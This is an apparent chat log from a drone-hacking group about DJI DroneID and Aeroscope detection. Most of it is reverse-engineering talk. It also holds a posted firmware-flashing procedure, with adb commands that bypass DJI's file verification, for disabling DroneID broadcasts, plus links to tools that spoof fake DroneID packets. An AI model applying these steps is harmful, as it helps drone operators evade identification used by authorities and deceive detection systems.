I still need to improve the implementation process. When I'm done, I'll post everything
[2019-12-05 21:27:44]
markusfriedl :
i have a spark to test if you need some support
[2019-12-06 16:29:36]
jcase :
@boris.plintovic what wifi chip/adapter are you using
[2019-12-06 16:35:37]
boris.plintovic :
I think Ralink
[2019-12-06 16:58:38]
jcase :
and it's capable of doing the short channels?
[2019-12-06 16:59:00]
jcase :
eg can you only listen, or can you connect to the network
[2019-12-06 17:19:08]
jcase :
@jacksphone for safety reasons
[2019-12-06 17:19:19]
jcase :
same reason i dont support removing NFZs in an unofficial way
[2019-12-06 17:19:38]
jcase :
but i believe that should fall on the individual user,
[2019-12-06 17:20:14]
jcase :
it is also a bit of a waste to do it, you can still detect the drones
[2019-12-06 17:21:13]
bobdole :
i see. thanks for answering my nosy question
[2019-12-06 17:21:18]
jcase :
no problem
[2019-12-06 17:47:24]
boris.plintovic :
it is a standard wifi usb adapter. Chip allows you to switch to monitor mode
[2019-12-06 17:54:35]
quad808 :
@jcase check your PM about my bees
[2019-12-06 21:31:24]
digdat0 :
i miss having bees, they are an amazing animal
[2019-12-06 21:59:11]
fredmicrowave :
Going to check my bees about your PM ...
[2019-12-06 23:13:08]
quad808 :
Do bees have knees?
[2019-12-07 08:25:39]
boris.plintovic :
**Spark Anti-Aeroscope Emma mod**
Before using this mod, please make sure your Spark has the original fw 1.00.0900
There are 2 files in the Firmwares folder. Use DUMLdore and flash _Emma1_, restart the drone, flash _Emma2_. You now have Spark fw 1.00.0900 AntiAeroscope.
And you need to flash custom 305, 306 modules (SuperPatcher); you need to use the procedure for P4.
• adb shell
• cd /vendor/bin
• chown root:root dummy_verify.sh
• chmod 755 dummy_verify.sh
• cp **/system/bin/dji_verify** /vendor/bin/original_dji_verify_copy
• sync
• cd /
and
• adb shell mount -o bind /vendor/bin/dummy_verify.sh **/system/bin/dji_verify**
<https://drive.google.com/open?id=1QnM_aCJrJzrNPap7C3BfX10cpQDfjeTc>
[2019-12-07 08:37:01]
exumpw :
Is it 801 module mix 0300 with 0900? Btw Mavic 0700 firmware also uses /system/bin/
[2019-12-07 08:38:27]
boris.plintovic :
yes
[2019-12-07 08:39:04]
boris.plintovic :
i tested and it works, but must start with original 1.00.0900
[2019-12-07 08:40:47]
boris.plintovic :
Don't try (modulemix) on MavicPro. I killed my drone
[2019-12-07 09:00:23]
jezzab :
What were you module mixing @boris.plintovic on the MP?
[2019-12-07 09:01:10]
boris.plintovic :
801 Android system module
[2019-12-07 09:02:26]
jezzab :
To stop the MP sending AS packets when switched to Wifi?
[2019-12-07 09:09:33]
boris.plintovic :
downgrade to 03.0600 and upgrade to 04.0300 without 801. MPP dead, no USB, no WiFi, no RC
[2019-12-07 09:10:09]
boris.plintovic :
On Spark it works fine. Tested on Kismet
[2019-12-07 09:16:14]
jezzab :
Why 01.03.0600?
[2019-12-07 09:21:55]
boris.plintovic :
last fw which does not broadcast droneid
[2019-12-07 09:56:19]
exumpw :
Where did you get info about 0600? I checked 0700 and 0600 have same modules. 0800 ath6kl_usb.ko also has no flight_info and get no droneid on kismet.
[2019-12-07 10:01:02]
kyokushin :
Thanks, could you tell how it is done? I would like to combine this patch with anti nfz and superpatcher in my Spark.
[2019-12-07 12:06:09]
boris.plintovic :
It does not matter. MPP apparently does not support modulemix with module 801. I killed 1 week old MPP, I don't plan to try again
[2019-12-07 12:14:45]
exumpw :
Just curious if I missed something. Anyway I think the 801 module is for WiFi only, so ocusync droneid will still be there.
I was just under the impression droneid was implemented for both ocusync and wifi only after 0900 (or 0800), but according to @jcase even old firmwares have it.
Other than that I dont see reason to module mix, if you dont need new firmware features. You can use FC Patcher on old firmwares as well, only need to find right offsets. I managed to adjust patch offsets for 0700.
[2019-12-07 12:16:39]
boris.plintovic :
Unfortunately we don't have an Aeroscope. It would make our job easier
[2019-12-07 12:21:39]
boris.plintovic :
Use Emma mod, after downloading firmware for Spark <https://github.com/brett8883/Super-Firmware_Cache/tree/master/Spark_Super_Patcher_FC> and use SuperPatcher as for Phantom4
[2019-12-07 12:59:42]
validat0r :
so this is a wrapper for superpatcher? what's the added value?
[2019-12-07 18:19:30]
boris.plintovic :
No, this is a standalone mode for shutting down droneid. SuperPatcher can then be applied but requires a slightly different procedure, as some system files that SuperPatcher calls during installation are located in other folders
[2019-12-07 18:22:58]
validat0r :
Standalone mode?
[2019-12-07 18:48:17]
boris.plintovic :
independent :slightly_smiling_face: can be used without any further modification
[2019-12-08 08:57:02]
eitan1195 :
how do you read the ocusync exactly?
[2019-12-09 15:43:08]
kyokushin :
Ookay, so how to use it with superpatcher?
What system files is the mod changing?
[2019-12-09 19:14:49]
bobdole :
is there a cheap dev version of aeroscope?
[2019-12-09 20:39:09]
dkovar :
AeroScope is generally available to LE only.
[2019-12-09 21:00:49]
boris.plintovic :
After applying the Emma mod, the dji_verify file is not in the sbin folder but in the system/bin/ folder
[2019-12-09 21:01:12]
validat0r :
so?
[2019-12-09 21:02:19]
boris.plintovic :
Must use the step-by-step for P4, not for Spark
<https://dji.retroroms.info/howto/manually_installing_custom_fw_from_fc_patcher>
[2019-12-09 21:03:17]
exumpw :
<https://pastebin.com/m5bD1zyS>
Updated esp8266 snippet to modify hardcoded droneid, mac, ssid, channel values.
I still think aeroscope might be able to easily filter WiFi packets and still detect Ocusync drones.
Also possible to detect fake access points (beacon packets) because there are no data packets or by similar signal strength (RSS).
[2019-12-09 21:04:07]
boris.plintovic :
Of course in the last step flash the .bin for Spark
[2019-12-09 21:04:53]
exumpw :
The only thing I would like to confirm with aeroscope is that droneid is still present over ocusync on old firmwares (0700, 0600).
[2019-12-09 21:09:08]
validat0r :
I get the dji_verify shenanigans ... but you're flashing just some vanilla .0300 modules, nothing more?
[2019-12-09 21:09:31]
validat0r :
and the modded FC surely has nothing to do with droneid, does it?
[2019-12-10 12:38:25]
boris.plintovic :
Yes, Emma1 flashes 0300 system modules, Emma2 all 0900 without 801. It's easy. But must start on original 0900, from 1000 it does not work.
[2019-12-10 12:42:24]
validat0r :
there were some problems running mixed modded spark .. can't remember, what it was .. no showstopper, but some nuisance
[2019-12-10 12:43:27]
validat0r :
anyway .. i'm running a no-droneid patched spark for months now .. i certainly won't modmix again
[2019-12-10 13:58:32]
jcase :
@exumpw what does that snippet do?
[2019-12-10 14:09:50]
boris.plintovic :
No-droneid patch?
[2019-12-10 14:11:18]
exumpw :
I just added modifiable values to the throwie and changed a few bytes to correspond with my Mavic 0900 WiFi droneid packets. <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>
[2019-12-10 14:16:51]
jcase :
have you tested it with an aeroscope?
[2019-12-10 14:17:01]
jcase :
because ESP8266 doesnt broadcast on the correct channel
[2019-12-10 14:24:08]
exumpw :
I don't have an aeroscope. I only tested with kismet and wireshark. Just out of curiosity, what is wrong with esp8266 channels? Was it discussed somewhere before?
[2019-12-10 15:15:36]
validat0r :
Well I have no aeroscope, so who knows if it works
[2019-12-10 15:16:27]
validat0r :
But to be sure I also changed the rf/ac Mac and beefed up the wep key
[2019-12-10 16:25:29]
boris.plintovic :
Droneid with ruby? Or only change MAC and WEP?
[2019-12-10 17:55:42]
jcase :
@exumpw DJI uses non standard wifi
[2019-12-10 17:56:26]
jcase :
I have a prototype AS, and I have some ESP8266 boards
[2019-12-10 18:37:19]
exumpw :
Is it true for controlling from phone wifi too, not RC (for Spark)?
I read in kismet repo that Spark RC use non standard wifi (you can only see it with atheros ath9k pci card, configured for quarter-channel mode).
My Mavic Pro 0900 in Wifi mode seems to use standard wifi and is captured by kismet.
[2019-12-10 18:38:48]
validat0r :
phone <-> AC has such a poor range, idk who uses that anyway
[2019-12-10 18:40:15]
validat0r :
spark RC <-> AC should use non (in some respect) standard wifi in ad-hoc mode .. and drone id packets are transmitted using this quarter-chan-mode
[2019-12-10 18:41:15]
validat0r :
and not every run-of-the-mill wifi card can be tuned to that mode. we experimented a bit and found some chipsets that were capable of capturing
[2019-12-10 18:42:44]
validat0r :
I used the atheros wifi card in my old T41p, which could at least see droneid packets on 2.4GHz
[2019-12-10 18:43:22]
validat0r :
in my notes I have this one: Atheros ath9k Atheros QCNFA222 AR5BWB222
[2019-12-10 18:43:51]
validat0r :
it's said it can capture the 5.8GHz packets, too. but I dont have it.
[2019-12-10 18:47:03]
exumpw :
Phone WiFi - AC has no practical use, but uses standard WiFi I think. But the question is whether aeroscope is capturing it or not?
[2019-12-10 18:47:46]
validat0r :
it's said it has like three dji rcs built in .. so I guess at least one of them will capture it
[2019-12-10 18:48:39]
exumpw :
If not then esp8266 throwie is useless indeed.
Although as I was saying, I think fake beacons still should be easily detected.
[2019-12-10 18:50:43]
validat0r :
it's proof of concept anyway ..
[2019-12-10 19:19:05]
markusfriedl :
should mavicmini be capturable via kismet and monitormode?
[2019-12-10 19:55:38]
validat0r :
Yes. Did it already.
[2019-12-10 20:02:44]
markusfriedl :
Then i guess i do something wrong or my adapter won't support it... started app and mavicmini... started kismet... set my alfanetwork card in monitor mode.. and use the filter for uav.. anything wrong here?
[2019-12-10 20:05:29]
exumpw :
You dont need to use filter for UAV in kismet. Just find drone wifi network click on it and droneid or mac / ssid match will be in one of left menus. You may need to turn on motors to get droneid packets on Mavic.
[2019-12-10 20:07:05]
exumpw :
there are screenshots of how it looks a few posts above.
[2019-12-10 20:09:06]
markusfriedl :
i'll try it again with motors on
[2019-12-10 20:28:18]
markusfriedl :
still not seeing anything... motor is on and monitor mode is capturing all packets around but no mavic mini
[2019-12-10 20:30:10]
exumpw :
maybe its working on 5.8 ghz?
[2019-12-10 20:37:03]
markusfriedl :
also switched the channels in the app.. at the current state i think the wifi adapter maybe is the problem.. but not sure
[2019-12-10 20:43:09]
validat0r :
Alfa sucks
[2019-12-10 20:43:33]
validat0r :
Have one too. Have never seen anything with it.
[2019-12-10 20:44:51]
markusfriedl :
could you suggest a good external one that works well with kali?
[2019-12-10 20:49:32]
validat0r :
No
[2019-12-10 20:50:07]
validat0r :
Back in the days Kevin said there are only good PCI cards. Maybe m2
[2019-12-10 20:57:24]
markusfriedl :
in my old lenovo there is just an "Intel Corporation Centrino Advanced-N 6205" and then i have the external (and also quite old) "Alfa AWUS036H"... i guess both of them are not the best... would appreciate any good hint for another external card
[2019-12-10 21:07:12]
validat0r :
Try the first one. Maybe you're as lucky as I was
[2019-12-10 21:10:40]
markusfriedl :
unfortunately not... i tried both
[2019-12-12 02:11:45]
jcase :
Atheros QCNFA222 AR5BWB222 is what you want
[2019-12-15 09:13:42]
markusfriedl :
anyone know an example of making false droneid packets.... like with python and the scapy module? haven't found a good example so far
[2019-12-15 15:53:28]
jcase :
@markusfriedl there is an exploit doing just that on github but you need specific wifi adapters
[2019-12-15 16:22:06]
markusfriedl :
@jcase can you send me the link please? :slightly_smiling_face:
[2019-12-15 16:24:21]
jcase :
you would need to google
[2019-12-15 16:24:23]
jcase :
just like i would
[2019-12-15 16:24:35]
jcase :
google kismet dji
[2019-12-15 16:35:21]
markusfriedl :
googled for that also.. but as i said.. nothing in python/scapy.... unless i've overlooked something.
[2019-12-15 18:26:20]
dkovar :
<https://www.kismetwireless.net/development/droneid/>
Freek’s github repo appears to be no longer available.
[2019-12-15 18:28:45]
markusfriedl :
thank you but i know that link already.. unfortunately in the pdf linked there is not the whole python code in it
[2019-12-15 18:29:16]
dkovar :
Yes, it used to be in the repo which appears to no longer be available.
[2019-12-15 18:29:49]
markusfriedl :
right... :confused:
[2019-12-15 18:42:22]
jcase :
maybe not python, but enough you could translate it <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie/blob/master/ESP8266_DJI_DroneID_Throwie.ino>
[2019-12-15 18:42:31]
jcase :
or just sniff it
[2019-12-15 18:42:36]
jcase :
and resend the packet
[2019-12-15 18:42:40]
jcase :
we're not looking at something hard here
[2019-12-15 18:50:42]
jcase :
just replay the packet
[2019-12-15 18:53:07]
markusfriedl :
will try it.. although i wanted to avoid it in the first case :wink:
[2019-12-15 20:16:15]
exumpw :
<https://pastebin.com/m5bD1zyS> - C esp8266 (my updated throwie version)
<https://github.com/DJISDKUser/metasploit-framework/blob/DJIDroneIDSpoof/modules/auxiliary/dos/wifi/droneid.rb> - Ruby
[2019-12-15 20:18:50]
exumpw :
if you know (or have an example) how to send a wifi beacon packet in python scapy then inserting the droneid data at the end of the packet would be a piece of cake
[2019-12-16 00:48:46]
jcase :
@exumpw esp8266 cant send it on the right freq
[2019-12-16 00:48:49]
jcase :
it doesnt support it
[2019-12-16 00:51:29]
exumpw :
@jcase yes, I know. You already mentioned it. Is it only for RC mode or for WiFi phone mode as well? Cause WiFi phone mode on Mavic seems regular WiFi.
[2019-12-16 00:51:51]
jcase :
hmm
[2019-12-16 00:51:55]
jcase :
mavic pro might be different
[2019-12-16 00:52:01]
jcase :
but not sure
[2019-12-16 00:52:09]
jcase :
good catch, forgot that was wifi
[2019-12-16 00:52:24]
jcase :
know what
[2019-12-16 00:52:28]
jcase :
ive got some esp8266
[2019-12-16 00:52:32]
jcase :
if you want to walk me through installing it
[2019-12-16 00:52:33]
jcase :
we can test it
[2019-12-16 01:01:26]
exumpw :
If you know how to setup Arduino IDE and set correct board (I have NodeMCU 1.0 ESP 12-E) it should be plug and play. Just compile and upload.
[2019-12-16 01:04:57]
jcase :
im leaving office, catch me this week and we can test
[2019-12-16 01:14:18]
jcase :
Aeroscope
[2019-12-16 13:00:29]
markusfriedl :
created the scapy packet structure.. haven't tested it yet cause i had no time... <https://github.com/Ace-Code1/opendrone/blob/master/fakebeacon.py>
[2019-12-18 09:27:28]
markusfriedl :
did some additional changes in the script so certain parameters are easier changeable
[2019-12-19 12:58:12]
eitan1195 :
any idea how the AD9363 in the phantom 4 is configured? (trying to demodulate the lightbridge again)
[2019-12-19 13:39:36]
eitan1195 :
some of it appears here - <https://github.com/o-gs/dji-firmware-tools/blob/master/lightbridge_stm32_hardcoder.py>
[2019-12-19 14:57:35]
eitan1195 :
getting "P3X_FW_V01.08.0080.bin: Extracting module index 0, 43776 bytes
Error: IV must be 16 bytes long" on the extraction
[2019-12-19 14:58:32]
mefisto :
@eitan1195 So as you see from the hardcoder, the STM32 chip configures AD9363 via SPI.
It is easier to work on Lightbridge from PH3 - it is identical, and has its own separate board.
For more info on various firmwares within OFDM, see wikis for modules on this list:
<https://github.com/o-gs/dji-firmware-tools/wiki/P3X-OFDM-Receiver-board#programming>
[2019-12-19 15:00:38]
eitan1195 :
hi, i am mainly interested in reversing the stm32 for those parts (i want to simulate the ad9363 with a dev board and emulate lightbridge)
[2019-12-19 15:00:57]
mefisto :
For the extraction issue - you can always create an issue on Github; just provide the full commandline and log. And for fix-it-yourself: all IVs in Ph3 encryption are just zeros.
[2019-12-19 15:01:57]
eitan1195 :
super - so i'll fix it myself. basically - if i get the <https://www.aliexpress.com/item/32854593561.html> and program it with the entire set of configs transferred to the ad9363, i should see lightbridge rx, am i wrong?
[2019-12-19 15:03:57]
mefisto :
You will get a binary stream; but that stream has structure handled by FPGA - you will have to figure out what the FPGA does to it.
[2019-12-19 15:04:34]
mefisto :
I imagine it does some special serialization, with added error correction.
[2019-12-19 15:06:43]
mefisto :
To help you with stm32 fw analysis, the partial symbols should be helpful:
<https://github.com/o-gs/dji-firmware-tools/tree/master/symbols>
[2019-12-22 07:32:39]
eitan1195 :
a binary stream - meaning bytes? i do not quite understand
[2019-12-22 08:45:31]
eitan1195 :
and how do i get to reverse the fpga itself? extract etc?
[2019-12-22 12:21:58]
eitan1195 :
basically - lightbridge is mimo-ofdm over wimax - how would i get it? no grc gnuradio chain for it. :disappointed:
[2019-12-25 03:00:01]
mefisto :
I mean binary data which is normally descrambled by fpga, to get video stream and duml packets.
[2019-12-25 03:01:10]
mefisto :
Good question. I imagine you figure out the bitstream format, then it's easy.
[2019-12-27 18:29:16]
zwontzov.da :
<https://techcrunch.com/2019/12/26/the-faa-proposes-remote-id-technology-for-drones/>
[2019-12-31 08:28:17]
eitan1195 :
in the p3x, any idea where the pairing process happens?
[2019-12-31 14:02:31]
nocommie :
Haven't been keeping up with the progress here but the latest BS with remote ID and DJIs "let anyone see your info via an app" BS got me wondering. Is it now possible to turn off or change the aeroscope info on an M1 on later hacked FW or an M2P on original hacked FW?
[2020-01-03 18:28:39]
dkovar :
I'm looking at a CSV file containing Aeroscope logging data. Most of the columns are obvious, but not all. Does anyone have a list of all of the columns, their meaning, and the units?
[2020-02-05 16:43:16]
peteair :
hi @dkovar, could you share it ?
[2020-02-05 16:47:41]
dkovar :
Alas, no, as that would reveal the source that shared it with us.
[2020-02-06 18:07:02]
bobdole :
oh its like that...
[2020-02-06 23:14:03]
dkovar :
Yeah, there aren't a lot of units out there and any particular region really doesn't have multiple options for which LE agency is operating them.
I'm trying to get an "eval" unit, which would eliminate the problem, but that is non-trivial.
[2020-02-07 16:16:51]
jcase :
Eval unit of what?
[2020-02-07 20:05:37]
bobdole :
aeroscope :poop:
[2020-02-07 23:23:35]
jcase :
@jacksphone i have one
[2020-02-07 23:23:37]
jcase :
at home
[2020-02-07 23:23:48]
jcase :
i need to fix an antenna on it
[2020-02-07 23:23:52]
jcase :
from taking it apart
[2020-02-08 00:36:18]
bobdole :
:sunglasses:
[2020-02-08 00:36:21]
bobdole :
i want one
[2020-02-08 11:51:46]
zwontzov.da :
@jcase can you take photos of the disassembled device? :grinning: It is very interesting which boards are used.
[2020-02-08 12:26:44]
jcase :
no
[2020-02-08 12:28:26]
jcase :
i dont want to expose any identifying serials etc
[2020-02-08 12:28:34]
jcase :
its the same one hostile had
[2020-02-08 13:47:52]
zwontzov.da :
Ok. I understand.
[2020-02-08 13:50:04]
zwontzov.da :
Why doesn't it work without one antenna? I thought that they use RX diversity with 2 antennas.
[2020-02-08 13:50:20]
jcase :
i dont know if it does or does not
[2020-02-08 13:50:26]
jcase :
i dont know much about RF
[2020-02-08 13:50:33]
jcase :
and i have antennas
[2020-02-08 19:18:13]
dkovar :
It may be that we only have the first part of the flight....
[2020-02-11 22:50:42]
huge1_10 :
dkovar what info do you need re the fields within AeroScope?
[2020-02-11 22:51:55]
huge1_10 :
Sam the antennas are PCB based, so half and half, that is one half for RX one half for TX.....
[2020-02-11 22:52:38]
huge1_10 :
jcase - really who cares about serial numbers, etc, your device transmits them on the Uplink and Downlink for the Quadcopter and it's stamped on the quadcopter and RC unit .....
[2020-02-11 22:54:00]
huge1_10 :
Hostile these days I hear is at one of the Car Giants doing work for them???
[2020-02-12 05:49:39]
dkovar :
@huge1_10 I got what I needed, thanks for checking.
[2020-02-12 18:53:27]
zwontzov.da :
@dkovar Did you use SDK for Aeroscope?
[2020-02-13 01:38:57]
dkovar :
We do not. No legitimate need at the moment, just professional interest in what it does, and the logs it produces.
[2020-02-13 18:05:29]
jcase :
@huge1_10 i can tell you flat out that the AS mobile does NOT transmit serial, it transmits nothing
[2020-02-13 18:06:02]
jcase :
the AS does NOT make a connection to the AC nor RC
[2020-02-13 18:06:09]
jcase :
so i have no idea what you are getting on about
[2020-02-13 18:06:25]
jcase :
the drone ID packet isn't even broadcast with the other traffic
[2020-02-13 18:07:56]
jcase :
maybe the G8 does, but i dont have one of those
[2020-02-13 19:12:35]
jcase :
i thought so
[2020-02-13 19:12:41]
jcase :
but ive not seen them
[2020-02-14 05:58:55]
huge1_10 :
jcase, I never said or indicated that AeroScope Sends Serial numbers. Aeroscope does indeed have a WIFI built in and so has the ability to connect to the internet, of which if you pay DJI the money, you can connect to the DB they have of all Registered DJI quads in your area. Also, you can ingest maps into Aeroscope, 2 ways, via the WIFI Connection or via SD Card.
[2020-02-14 05:59:31]
huge1_10 :
Last I knew, Aeroscope can transmit via internet, and it does NOT nor did I ever suggest it sends or transmits quadcopter serial numbers.
[2020-02-14 06:01:40]
huge1_10 :
re-read what I posted, which is jcase - really who cares about serial numbers, etc, your device transmits them on the Uplink and Downlink for the Quadcopter and it's stamped on the quadcopter and RC unit ..... your device in this instance is the quadcopter, not AS.
[2020-02-14 06:01:58]
huge1_10 :
Does that help?
[2020-02-14 13:44:03]
jcase :
AS can transmit over the internet, it's an option. I've not used the option however. Look at the AS assistant.
[2020-02-25 01:04:10]
nocommie :
Has anyone looked at what is being broadcast with the DJI Digital FPV system? I just saw a vid of someone claiming "remote ID" is being broadcast. AFAIK it doesn't have a GPS so it would have to be just a beacon that could be triangulated. Or, does it use info from the baro etc from betaflight or whatever board you connect via serial for the OSD? I just ordered a system and want to know what it does and does not do. Oh, and in the same vid they called out dunhill for his long range Disco flying (they said it was an eBee FFS)
[2020-02-28 18:48:03]
eseven :
Did you extract it from assistant or internal sd?
[2020-02-28 18:54:04]
dkovar :
It was provided to us and I think it came from assistant.
[2020-03-07 23:13:24]
chipmangini :
<https://www.youtube.com/watch?time_continue=601&v=pDK_RlUXUlY&feature=emb_logo>
[2020-03-08 09:57:24]
validat0r :
Awesome
[2020-04-14 20:20:04]
jcase :
@boris.plintovic did you delete your emma mod from google drive?
[2020-04-15 17:27:39]
boris.plintovic :
Yes. I moved to another program. If you need it, I will upload it back to googledisk
[2020-04-15 17:39:19]
jcase :
@boris.plintovic i can test it on a live AS for you if you want, i just repaired my spark
[2020-04-15 17:39:25]
jcase :
i went to do that and it was gone
[2020-04-15 18:10:45]
boris.plintovic :
[Http://boris.fanatix.sk/Emma.zip](Http://boris.fanatix.sk/Emma.zip)
Use dumldorev3.exe, load emma1_dji_system.bin, flash, restart drone, load emma2_dji_system.bin, flash, restart. Test
[2020-04-15 18:22:51]
bin4ry :
what is emma mod?
[2020-04-15 18:43:18]
jcase :
drone id patch
[2020-04-15 18:50:11]
boris.plintovic :
@bin4ry standard aeroscope telemetry in kismet, and next photo with emma. But no test on real aeroscope
[2020-04-15 19:51:48]
jcase :
@boris.plintovic drone ID function does NOT pick it up, but it is picked up on the RF graphs (as expected). With that said, an additional tool allows intercept of full comms, including positioning data
[2020-04-15 19:52:07]
jcase :
not much you can do about the latter two
[2020-04-15 19:59:15]
validat0r :
nice .. you tested that with AS?
[2020-04-15 20:00:37]
boris.plintovic :
and now please try simple speech
[2020-04-15 20:00:45]
validat0r :
:smile:
[2020-04-15 20:01:25]
validat0r :
i'm still chewing on the "additional tool"
[2020-04-15 20:01:58]
validat0r :
can't do anything about RF emissions
[2020-04-15 20:05:48]
validat0r :
I wonder how the interception of the "full comms" works though ..
[2020-04-15 20:05:57]
validat0r :
breaking the WEP encryption on the fly?
[2020-04-15 20:56:18]
jcase :
@boris.plintovic it's ineffective to hide the presence of the drone
[2020-04-15 20:56:24]
jcase :
@ilovemynexus4 yes i tested it
[2020-04-16 04:59:28]
bin4ry :
@boris.plintovic i see. what are you doing? mixing modules with an old version of spark firmware or what is your approach?
[2020-04-16 07:04:05]
kyokushin :
is aeroscope effective against spark .300 firmware?
this version should be pre-aeroscope
[2020-04-16 07:32:53]
boris.plintovic :
yes, easy modulemix. downgrade to 0300 without battery module and upgrade to 0900 without Android system module. Result is clean 0900 with old Android system. One difference ... If you then want to use the "custom" 305-306 module, you must use step-by-step Phantom, since the file verify is not in "/sbin/dji_verify" but now in "/system/bin/dji_verify"
[2020-04-16 07:40:27]
kyokushin :
But 305-306 are FC, if something about drone id is stored then rather in android module than FC, correct me if i am wrong pls
[2020-04-16 08:03:31]
boris.plintovic :
Aeroscope ID broadcast is in wifi driver (Android system in drone), has nothing to do with FC
[2020-04-16 08:06:15]
kyokushin :
so it's not possible just to take the files from .300 wifi driver and put them in .900 or .1000?
[2020-04-16 08:07:16]
validat0r :
the files are protected by DJI's crude tamper prevention mech
[2020-04-16 08:07:36]
validat0r :
well, probably not the drivers
[2020-04-16 08:08:25]
validat0r :
you'd have to check if the change was in the drivers or the dji_... binary anyway
[2020-04-16 08:08:40]
kyokushin :
@jcase could you test a @ilovemynexus4 patch on Aeroscope? His patch is for .900 and on Kismet showing promising data
[2020-04-16 08:14:11]
boris.plintovic :
validat0r have something new (patch)?
[2020-04-16 13:44:55]
jcase :
1. i'm not testing old firmwares, b) aeroscope can pick up the RF, so yes it can detect it
[2020-04-16 13:45:52]
jcase :
@kyokushin is it significantly different than @boris.plintovic 's? his works for droneid. Nothing is going to work for the other tools on hand
[2020-04-16 13:59:59]
kyokushin :
Yes it is very different and worth testing, no module mix, change in specific file, @ilovemynexus4 knows the details.
[2020-04-16 14:09:06]
jcase :
@kyokushin for what drone? and how is it different
[2020-04-16 14:09:29]
jcase :
i mean there are a dozen ways to kill droneid on spark
[2020-04-16 14:09:38]
jcase :
it's not going to do much different, either it works or not
[2020-04-16 14:09:45]
jcase :
but it won't totally evade aeroscope
[2020-04-16 14:46:16]
bin4ry :
@kyokushin means ie i think
[2020-04-16 14:51:23]
kyokushin :
It's for spark, but surely @ilovemynexus4 will explain better than me how it works
[2020-04-24 07:18:44]
boris.plintovic :
I didn't edit anything. I used information and older research that DJI modified the wifi driver in the Android drone system. I used modulemix, downgrade to 0300 (latest clean version) and upgrade to 0900 without system module.
[2020-04-24 11:08:02]
b1tninja :
[https://www.google.com/url?sa=t&source=web&rct=j&url=https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf&ved=2ahUKEwjTrPXu9YDpAhVCmK0KHSA8AN4QFjAAegQIBRAC&usg=AOvVaw3JJk-0p_KiBb9XZz1qcEqC](https://www.google.com/url?sa=t&source=web&rct=j&url=https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf&ved=2ahUKEwjTrPXu9YDpAhVCmK0KHSA8AN4QFjAAegQIBRAC&usg=AOvVaw3JJk-0p_KiBb9XZz1qcEqC)
[2020-04-24 11:08:40]
b1tninja :
Fuck why is it difficult to get the url of a pdf on Android without Google fucking wrapping it with their crap
[2020-04-24 11:10:37]
validat0r :
<https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>
[2020-04-24 11:11:11]
validat0r :
Yeah, that's kevin's paper iirc. always good to look at if you want to get up to speed
[2020-05-06 15:20:32]
daviskat :
NLD patch, FC serial number is displayed as N/A, can Aeroscope detect the real FC serial number of the aircraft?
[2020-05-06 17:15:14]
jcase :
it's not displayed as N/A, it comes out as fakefakeXXXXXX
[2020-05-06 17:15:15]
jcase :
but
[2020-05-06 17:15:16]
jcase :
yes
[2020-05-06 17:15:22]
jcase :
you can still get the serial number of the device
[2020-05-06 17:15:25]
jcase :
just a bit harder
[2020-05-06 18:06:19]
boris.plintovic :
what exactly is FC Serial number? SN of drone, or?
[2020-05-06 18:23:31]
jcase :
the serial number of the flight controller
[2020-05-30 22:43:20]
nopexecutor :
has anyone tried getting the same info as aeroscope does from any non-WIFI RF link?
[2020-05-31 00:25:44]
jcase :
good luck
[2020-05-31 10:22:05]
nopexecutor :
I managed to get some insight on the ocusync 2.0 signal, based on some RF recordings - the general structure, scrambling, channel mapping, up to decoding and extracting transport blocks (though I haven't automated that yet...). I begin to understand the structure of many transport blocks, but it is still not a complete view. I wonder where the aeroscope data hides there; not sure yet. There seems to be one small capacity add-on channel, which I have no understanding of at all so far (extracted data looks random ;)), maybe it's where it is present...
[2020-05-31 12:53:37]
jcase :
interesting, i have an aeroscope here, and have some very minor insight into the RF but most of my knowledge is the protocol
[2020-05-31 12:54:17]
jcase :
what kind of data are you looking for ? Drone ID is broadcast separate from control signal
[2020-05-31 13:10:43]
nopexecutor :
Hmm, just trying to grasp what to expect; if e.g. underlying data structure is same in WiFi and some captures are available it may make it easier to find it / understand the encoding in ocusync signal. If it is embedded there at all - I haven't looked for drone emissions at other frequencies. I hope it being separate from control signal as you wrote doesn't mean some second unrelated RF channel, just embedding on some dedicated OFDM symbols of the main downlink...
[2020-05-31 13:12:11]
jcase :
curious how you got the hop down, i'm an RF noob but that is the most difficult part. You will find there are more than one variation of OC2, and some will be encrypted
[2020-05-31 13:12:28]
jcase :
(maybe all but i'm not positive)
[2020-05-31 13:13:18]
jcase :
the aeroscope does not handle the hop, it just listens for droneid which should be non hopping
[2020-05-31 14:34:44]
david218 :
Does the aeroscope still work if these settings are disabled?
[2020-05-31 15:06:48]
nopexecutor :
hm, I didn't know there is an option to disable it... that may be helpful...
[2020-05-31 16:21:11]
david218 :
The annoying part is that it enables itself again after every reboot lol.
[2020-05-31 19:45:23]
boris.plintovic :
@david218 these are not aero packets
[2020-05-31 20:11:57]
nopexecutor :
hm, so it's for some other drone-id method? Is it for the "drone-to-phone" system?
[2020-06-01 07:25:52]
peteair :
hey ! really interesting ! I've also managed to get some info on Ocusync 1.0 on my side. It seems very similar to some kind of LTE with a symbol duration of 66.6us (15 kHz subcarrier spacing) and 1200 carriers for 18 MHz BW. I was trying to get the subcarrier mapping by making stats on a lot of packets and trying to isolate the pilot subcarriers. But I'm really curious about how you managed to reverse the scrambling / whitening sequence (if you're willing to share)? Was it something similar to classical protocols (WiFi / LTE) as I suspected?
I also see the add-on channel in Ocusync 2.0 (slightly shifted from the carrier center freq but with a very slow rate) which was not present in Ocusync 1.0. So it's most certainly the drone id but no luck demodulating it for the moment.
[2020-06-03 06:29:20]
eseven :
@dave where did you found this settings? Djigo? Version?
[2020-06-06 12:28:22]
kyokushin :
Can anyone confirm or deny detection of the Spark on .300 firmware (pre-aeroscope/droneid) by aeroscope?
[2020-06-06 15:35:40]
jcase :
@kyokushin depending on the software they are using with the AS, it is able to detect drones without droneid
[2020-06-06 15:35:50]
jcase :
so yes i can see spark on .300 or any firmware
[2020-06-06 15:38:04]
kyokushin :
Thanx. How about phantom 3 pro?
[2020-06-06 15:41:04]
jcase :
yes
[2020-06-06 15:41:29]
jcase :
it cant get as fine detail
[2020-06-06 15:41:31]
jcase :
but it can see them
[2020-06-06 16:19:25]
kyokushin :
You can see the drone operator location both for sparks and p3p or only flying copters?
[2020-06-06 21:27:22]
david218 :
